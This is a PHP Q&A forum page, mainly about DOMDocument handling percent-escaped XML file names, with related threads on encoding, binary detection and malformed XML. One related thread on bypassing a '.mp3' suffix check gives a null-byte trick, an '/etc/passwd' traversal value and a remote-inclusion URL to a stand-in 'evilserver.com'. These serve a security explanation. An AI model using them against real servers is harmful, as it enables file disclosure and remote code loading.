PHP - DOMDocument load XML with encoded name

Let's say that in my Flash project I have a script that dynamically creates XML files for me (via PHP). The XML file name is based on a specific variable and is escaped using escape(variable), because that variable may (and mostly does) contain characters that are not supported in file names...
I need to know the precise name of the XML file later in my Flash project, because I load these XML files only if unescape(XMLfile) == variable. There are a lot of variables, so I can't just use String.replace() to wipe out the unsupported file name characters...
Here is the part of the PHP file I'm using:
$XMLDom = new DomDocument('1.0', 'UTF-8');
$xmlId = trim($_POST['xmlId']);
if (file_exists($xmlId)) {
    $XMLDom->load($xmlId);
} else {
    $newXMLHandler = fopen($xmlId, 'w') or die("can't open file");
    fclose($newXMLHandler);
    $XMLDom->load($xmlId);
    .... rest of the code ....
    $XMLDom->save($xmlId);
}
The result of the code above is that two newly created XML files appear in the directory:
one empty XML file created by fopen($xmlId, 'w'), named "fi%20le%2C%2E%40.xml",
and a second one named "fi le,.#.xml", where all my new XML data is stored...
Is there any way to make PHP load an XML file that has an escaped name?
Thanks in advance.
Arthur.

I'm not fully confident that I understand your problem, but if your question is what the PHP analogue of escape() is, then urlencode() looks like the best match. You still need to research exactly which characters are being escaped. Note, for example, that there are several different ways to percent-encode strings, especially multibyte strings. Flash may use escapeMultiByte() or encodeURIComponent(); each encodes a different subset of characters, and does so differently - so beware!
Now, regarding file names: if your HTTP server is running on a Unix system, then "fi le,.#.xml" is a valid file name. It is inconvenient at times, but it is a legitimate name, so there is nothing to worry about.
touch 'fi le,.#.xml'
would create the file without problems. Basically, the only restricted characters are the slash and the null character ("\x00"), but it is also common to restrict characters that the shell may interpret specially - this is really up to you.
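The two files described in the question are consistent with DOMDocument::load() and save() treating their argument as a URI and decoding percent-escapes, while fopen() uses the name literally. That is my understanding of how PHP's libxml integration resolves file names, not something the question confirms. Under that assumption, a minimal sketch that keeps the escaped name intact is to do the file I/O with plain PHP functions and hand DOMDocument only strings. The helper names loadXmlLiteral() and saveXmlLiteral() are hypothetical.

```php
<?php
// Hypothetical helpers: the file name is only ever seen by plain PHP file
// functions, so percent-escapes in it are never decoded.

function loadXmlLiteral(string $path): DOMDocument
{
    $dom = new DOMDocument('1.0', 'UTF-8');
    if (is_file($path) && filesize($path) > 0) {
        // loadXML() parses a string, so no file name reaches libxml.
        $dom->loadXML(file_get_contents($path));
    }
    return $dom;
}

function saveXmlLiteral(DOMDocument $dom, string $path): void
{
    // saveXML() returns the serialized document as a string.
    file_put_contents($path, $dom->saveXML());
}

// Example: an escaped name similar to the one in the question.
$path = sys_get_temp_dir() . '/' . rawurlencode('fi le,@') . '.xml';
$dom = loadXmlLiteral($path);
if ($dom->documentElement === null) {
    $dom->appendChild($dom->createElement('root'));
}
saveXmlLiteral($dom, $path);
```

With this approach there is also no need to create an empty file with fopen() first, because a missing file simply yields an empty document.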

Related

Which special characters can cause a file path to be misinterpreted?

For example, take this function (pseudocode):
if ($_GET['path'] ENDS with .mp3 extension) { read($_GET['path']); }
Is it possible for an attacker to bypass it by using some special symbol or method, e.g.:
path=file.php^example.mp3
or
path=file.php+example.mp3
or something similar?
In other words, does a symbol exist in PHP such that everything after it is ignored, so that PHP tries to open file.php?
P.S. DON'T POST ANSWERS about PROTECTION! I NEED TO KNOW WHETHER THIS CODE can be bypassed, as I HAVE TO REPORT MANY SCRIPTS for this issue (if it really is an issue).

Does a symbol exist in PHP such that everything after it is ignored, so that PHP tries to open file.php?
Yes, such a symbol exists; it is called the 'null byte' ("\0").
This is because in C (the language the PHP engine is written in) the end of a string is signalled by the null byte, so the string ends wherever a null byte is encountered.
If you want the string to end with .mp3 you should manually append it.
Having said that, it is, generally speaking, a very bad idea to accept a user supplied path from a security standpoint (and I believe you are interested in the security aspect of this, because you originally posted this question on security.SE).
Consider the situation where:
$_GET['path'] = "../../../../../etc/passwd\0";
or a variation on this theme.
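To make the point concrete, here is a small sketch showing that a suffix test alone accepts a path with an embedded null byte. As far as I know, PHP 5.3.4 and later refuse paths containing a null byte in filesystem functions, so the truncation itself mainly affects older versions; treat that as background rather than something this thread confirms. The function names are hypothetical.

```php
<?php
// A suffix test on its own: true for any string whose last four bytes
// are ".mp3", no matter what comes before them.
function endsWithMp3(string $path): bool
{
    return substr($path, -4) === '.mp3';
}

// Hypothetical stricter check: also reject null bytes and any directory
// component, so only a bare file name is accepted.
function isPlainMp3Name(string $path): bool
{
    return endsWithMp3($path)
        && strpos($path, "\0") === false
        && basename($path) === $path;
}

$tricky = "file.php\0example.mp3";
var_dump(endsWithMp3($tricky));     // the suffix check passes
var_dump(isPlainMp3Name($tricky));  // rejected because of the null byte
```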

The leading principle in programming is "Don't trust user input". So the main problem in your case is not a special character; it's how you work with your data. You shouldn't use a path given by a user, because the user can manipulate the path or other variables.
To escape user input and neutralize bad characters you can use htmlspecialchars, or you can filter your GET input with filter_input, something like this:
$search_html = filter_input(INPUT_GET, 'search', FILTER_SANITIZE_SPECIAL_CHARS);

WE CAN'T TELL YOU IF THE CODE CAN BE "BYPASSED" BECAUSE YOU'VE NOT GIVEN US ANY PHP CODE
As to the question of whether it's possible to trick PHP into processing a file it shouldn't, based on the end of the string: the answer is only if there is another file somewhere else which has the same ending. However, by default, PHP will happily read from URLs using the same functions it uses for reading local files. Consider:
http://yourserver.com/yourscript.php?path=http%3A%2F%2Fevilserver.com%2Fpwnd_php.txt%3Ffake_end%3Dmp3

PHP - alternative to Base64 with shorter results?

I'm currently using base64 to encode a short string and decode it later, and wonder if a better (shorter) alternative is possible.
$string = '/path/to/img/image.jpg';
$convertedString = base64_encode($string);
// New session, new user
$convertedString = 'L3BhdGgvdG8vaW1nL2ltYWdlLmpwZw==';
$originalString = base64_decode('L3BhdGgvdG8vaW1nL2ltYWdlLmpwZw==');
// Can $convertedString be shorter by any means ?
Requirements :
Shorter result possible
Must be reversible any time in a different session (therefore unique)
No security needed (anyone can guess it)
Any kind of characters that can be used in a URL (except slashes)
Can be an external lib
Goal :
Get a clean unique id from a path file that is not the path file and can be used in a URL, without using a database.
I've searched and read a lot, looks like it doesn't exist but couldn't find a definitive answer.

Well since you're using these in a URL, why not use rawurlencode($string) and rawurldecode($encodedString)?
If you can reserve one character like - (i.e., ensure that - never appears in your file names), you can do even better by doing rawurlencode(str_replace('/', '-', $string)) and str_replace('-', '/', rawurldecode($encodedString)). Depending on the file names you pick, this will create IDs that are the same length as the original filename. (This won't work if your file names have multi-byte characters in them; you will need to use some mb_* functions for that case.)
You could try using compression functions, but for strings as short as file paths, compression usually makes the output larger than the input.
Ultimately, unless you are willing to use a database, disallow certain file names, or you know something about what kinds of file names will come up, the best you can hope for is IDs that are as short or almost as short as the original file names. Otherwise, this would be a universal compression function, which is impossible.
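The reserved-character idea above can be sketched as a pair of functions. This assumes, as the answer does, that '-' never appears in the original paths; the names pathToId() and idToPath() are hypothetical.

```php
<?php
// Assumes '-' never occurs in the original path (the reserved character).
function pathToId(string $path): string
{
    // Swap slashes for the reserved character, then percent-encode the rest.
    return rawurlencode(str_replace('/', '-', $path));
}

function idToPath(string $id): string
{
    // Reverse order: decode first, then restore the slashes.
    return str_replace('-', '/', rawurldecode($id));
}

$id = pathToId('/path/to/img/image.jpg');
echo $id, "\n";            // -path-to-img-image.jpg
echo idToPath($id), "\n";  // /path/to/img/image.jpg
```

For this path the ID has the same length as the input, because letters, digits, '-', '.', '_' and '~' are left unencoded by rawurlencode(). Any other character costs three bytes in the ID.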

I don't think there is anything reliable out there that would significantly shorten the encoded string and keep it URL friendly.
e.g. if you use something like
$test = gzcompress(base64_encode($parameter), 9, ZLIB_ENCODING_DEFLATE);
echo $test;
it would generate characters that are not URL-friendly and any post-transformation would be just a risky mess.
However, you can easily transform text to get URL-friendly parameters.
I use the following code to generate URL-friendly parameters:
$encodedParameter = urlencode(base64_encode($parameter));
And the following code to decode it:
$parameter = base64_decode(urldecode($encodedParameter));
As an alternative solution, you could use generated tokens to map known files using some database.
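A related variant, which is not what this answer uses, is the "URL-safe" Base64 alphabet: replace '+' and '/' with '-' and '_' and drop the '=' padding. It avoids the percent-escapes that urlencode() adds for those characters and also satisfies the "no slashes" requirement. The sketch below is an illustration with hypothetical function names.

```php
<?php
// URL-safe Base64: '+' and '/' become '-' and '_', padding is dropped.
function base64UrlEncode(string $data): string
{
    return rtrim(strtr(base64_encode($data), '+/', '-_'), '=');
}

function base64UrlDecode(string $encoded): string
{
    // Restore the standard alphabet and the padding before decoding.
    $standard = strtr($encoded, '-_', '+/');
    $padding  = (4 - strlen($standard) % 4) % 4;
    return base64_decode($standard . str_repeat('=', $padding));
}

$id = base64UrlEncode('/path/to/img/image.jpg');
echo $id, "\n";
echo base64UrlDecode($id), "\n";
```

The result is still roughly a third longer than the input, so this only removes the escaping overhead; it does not beat the length of the original string.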

Extract XML from .prt file using PHP but file becomes unreadable when opened with PHP

I have a .prt (CAD Design File) that I need to extract some XML from using PHP. When I view this file directly in the browser, I can see the XML along with some unreadable areas. However, when I open it using PHP to get the XML I need from it, the file becomes mostly unreadable and the XML is nowhere to be found; the file looks as if it were encrypted.
This is an example of what the .prt file looks like when opened directly in the browser: File in Browser
This is an example of what the file looks like when opened using PHP: Using PHP
This is how I am trying to open the file with PHP:
$handle = fopen("thePart.prt", "rb");
$contents = trim(stream_get_contents($handle));
fclose($handle);
//echo out contents to see what happens
echo $contents;
If I could get this file to open without doing what it is doing, I can get the XML out of it myself. How do I fix the issue that I am having? Thank you very much in advance.

Real Answer
Turns out that there was no problem at all with the code. The browser was just interpreting the XML tags as HTML and so the data was not displayed (PHP by default sets a content type of text/html). When viewing the source code, the XML was plain and visible. The XML can also be seen without viewing the source by setting the content type of the php file:
header('Content-Type: text/plain');
This way, the browser will just display the XML as it is, without attempting to parse it as HTML first.
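If the page has to stay text/html, an alternative is to escape the markup characters before echoing, so the browser shows the tags as text. This is a minimal sketch; the function name and the sample bytes are hypothetical stand-ins for the contents read from the .prt file.

```php
<?php
// Hypothetical helper: make raw file contents safe to show inside an HTML page.
function asVisibleHtml(string $contents): string
{
    // ENT_SUBSTITUTE replaces invalid UTF-8 sequences instead of returning
    // an empty string, which matters for partly binary input.
    return htmlspecialchars($contents, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Stand-in for the bytes read from the .prt file.
$contents = "\x01\x02<part><name>demo</name></part>\x03";
echo '<pre>', asVisibleHtml($contents), '</pre>';
```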
Initial Answer
Just a guess here, but it might be that you're opening the file in binary mode (the "rb" in your first line of code). Try opening it as a plain text file (use "r" instead of "rb").
More likely, it's an encoding issue where PHP is trying to decode a UTF-8 file as ASCII, for instance. Since you are opening a binary file (CAD Design File is binary with a little XML, I'm assuming), PHP might be getting confused while trying to detect the encoding of the file. I would need a copy of the file to know for sure.
Try comparing the result of mb_detect_encoding:
mb_detect_encoding($contents)
and the actual encoding of the XML data within the .prt file. If they are different, that's how you know that PHP is using the wrong encoding. In that case, use mb_convert_encoding to convert from PHP's detected encoding to that of the XML data.

Determine if a PHP resource contains binary or text

I am using MongoDB and storing files into GridFS using PHP. I am pulling files out via:
$mongo = new Mongo;
$images = $mongo->my_db->getGridFS('images');
$image = $images->findOne('epic-beard-man.png');
$stream = $image->getResource();
Which is cool, because $stream is a PHP resource. The thing I need, is to determine if the stream/resource is binary or text. If it is text, I want to output it, otherwise if it is binary, I don't want to output it.
Is there a magical function like: is_binary($stream)
EDIT
echo get_resource_type($stream);
Returns STREAM. Hum, not very useful.

You cannot check this without actually reading from the resource. You can read the whole thing and look for non-printable characters (which should happen pretty fast if it is an image). You can check for "printability" with ctype_print, which will unfortunately return false for tabs and newlines, so it may not be the best one after all. You can also build your own regex to check the data:
preg_match(':^(\P{Cc}|[\t\n])*$:', $data)
The best and easiest thing to do is however to save the data type, possibly the MIME type, together with the object. That way you do not need to do anything magic at display time.
I think that schemaless databases like MongoDB need at least as much care in the design stage as relational databases. This is a typical thing to think about when designing a database: what type does my data have?
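The read-and-inspect approach can be sketched as follows. It only samples the start of the stream, assumes that text means UTF-8, and also allows carriage returns in addition to the tabs and newlines mentioned above. The function name is hypothetical, and this is a heuristic rather than a definitive test.

```php
<?php
// Hypothetical helper: read a sample from the stream and guess whether it
// is text. Note that this consumes the sample; rewind() afterwards if the
// stream is seekable and the data is still needed.
function streamLooksLikeText($stream, int $sampleSize = 8192): bool
{
    $sample = fread($stream, $sampleSize);
    if ($sample === false) {
        return false;            // read error: do not treat as text
    }
    // Allow tab, LF and CR; reject every other control character.
    // With the /u flag, invalid UTF-8 makes preg_match() return false,
    // which is also treated as "binary" here.
    return preg_match('/^[\P{Cc}\t\n\r]*+$/u', $sample) === 1;
}

$stream = fopen('php://memory', 'w+');
fwrite($stream, "plain text\n\twith a tab");
rewind($stream);
var_dump(streamLooksLikeText($stream));
fclose($stream);
```

One limitation of sampling: if the cut falls in the middle of a multibyte character, valid UTF-8 text longer than the sample can be misreported as binary.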

XML not well formed error

I have a php script that writes xml data to a file and another one that sends the contents of this file to the client as the response.
But on the client side, I'm getting the following error:
XML Parsing Error: not well-formed
When I view the source of the page, the XML I see is as follows:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<books><date>December 24th, 2009</date><total>2</total><book><name>Book 1</name><url>http://www.mydomain.com/posters/68370/img.jpg</url></book><book><name>Book 2</name><url>http://www.anotherdomain.com/posters/76198/img1.jpg</url></book></books>
In file1.php I have the following code that writes the XML to a file:
$file= fopen("book_results.xml", "w");
$xml_writer = new XMLWriter();
$xml_writer->openMemory();
$xml_writer->startDocument('1.0', 'UTF-8', 'yes');
$xml_writer->startElement('books');
$xml_writer->writeElement('date',get_current_date()); // Like December 23rd, 2009
$xml_writer->writeElement('total',$totalResults);
foreach ($bookList as $key => $value) { /* $bookList contains key value pairs */
    $xml_writer->startElement('book');
    $xml_writer->writeElement('name', $key);
    $xml_writer->writeElement('url', $value);
    $xml_writer->endElement(); //book
}
$xml_writer->endElement(); //books
$xml_data = $xml_writer->outputMemory();
fwrite($file,$xml_data);
fclose($file);
And in index.php, I have the following code to send the contents of the file as a response:
<?php
//Send the xml file contents as response
header('Content-type: text/xml');
readfile('book_results.xml');
?>
What could be causing the error ?
Please help.
Thank You.

The above looks good to me (including the fact that you're forming the XML via a dedicated component) and either:
what you're using to validate this is wrong
you're looking at something different to what you think you are
I would definitely try another tool/browser/whatever to validate this. Additionally, you may want to save the XML file as sent to the browser, and check it using XMLStarlet (a command-line XML toolkit).
I'm also wondering whether it's an issue that we can't easily see - a character encoding problem or a byte-order mark issue (related to encodings). Does the character encoding of the web page you're sending match the encoding of the XML (UTF-8)?
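Another way to cross-check, staying in PHP, is to parse the exact bytes that index.php sends and list whatever libxml complains about. This is a minimal sketch with a hypothetical helper name; it checks well-formedness only, not validity against a schema or DTD.

```php
<?php
// Hypothetical helper: return libxml's parse errors for a non-empty XML string.
function xmlParseErrors(string $xml): array
{
    // Collect errors instead of emitting PHP warnings.
    $previous = libxml_use_internal_errors(true);
    libxml_clear_errors();

    $dom = new DOMDocument();
    $dom->loadXML($xml);

    $messages = [];
    foreach (libxml_get_errors() as $error) {
        $messages[] = sprintf('line %d, column %d: %s',
            $error->line, $error->column, trim($error->message));
    }

    libxml_clear_errors();
    libxml_use_internal_errors($previous);
    return $messages;
}

// Example: an unclosed <total> element is reported as an error.
print_r(xmlParseErrors('<books><total>2</books>'));
```

Running it on file_get_contents('book_results.xml') would show whether the file on disk is the problem or whether something is added on the way to the client.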

There are some free websites and tools for checking for validity in XML.
According to the XML Validator, when I pasted your XML above into the textarea, it said "no errors found".
However, Validome says "Can not find declaration of element 'books'."
Perhaps Jeff's suggestion of changing date and total to attributes might help. It would probably be easy to try that.

Have you tried using those 2 loose date and total tags as attributes instead?:
<books date="December 24th" total="2">
Also, XML can be quite sensitive. Make sure to use CDATA sections where appropriate.

It validates fine in WMHelp XMLPad 3.0.1.0, and opens fine in FireFox 3.0.8 and IE7 without errors.
The only thing I can see, from a copy and paste of your XML, is that the XML declaration is followed by a CR/LF combination (0x0D 0x0A). This is platform-specific (Windows), and may be an issue on the client; you didn't mention what the client was, however, so I can't be sure if that's the problem.

Ensure that you are writing UTF-8 or 7-bit ASCII encoding to the file (test with a text editor or the 'file' command, if you have it), and that your checker supports it. Keep in mind that UTF-8 can include a signature (sometimes called the byte-order mark) in the first three bytes (EF BB BF) that sometimes confuses some tools if it is there, and rarely if it is not.
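Checking for the signature takes only a few lines. The sketch below tests the first three bytes against EF BB BF and optionally strips them; the function names are hypothetical.

```php
<?php
// The UTF-8 signature (byte-order mark) as raw bytes.
const UTF8_BOM = "\xEF\xBB\xBF";

function hasUtf8Bom(string $data): bool
{
    // Compare only the first three bytes.
    return strncmp($data, UTF8_BOM, 3) === 0;
}

function stripUtf8Bom(string $data): string
{
    return hasUtf8Bom($data) ? substr($data, 3) : $data;
}

// Example: data that starts with the signature.
$data = UTF8_BOM . '<books/>';
var_dump(hasUtf8Bom($data));
echo stripUtf8Bom($data), "\n";
```

Applied to file_get_contents('book_results.xml'), this would show whether the file written by file1.php starts with the signature.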

<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
Use single quotes.
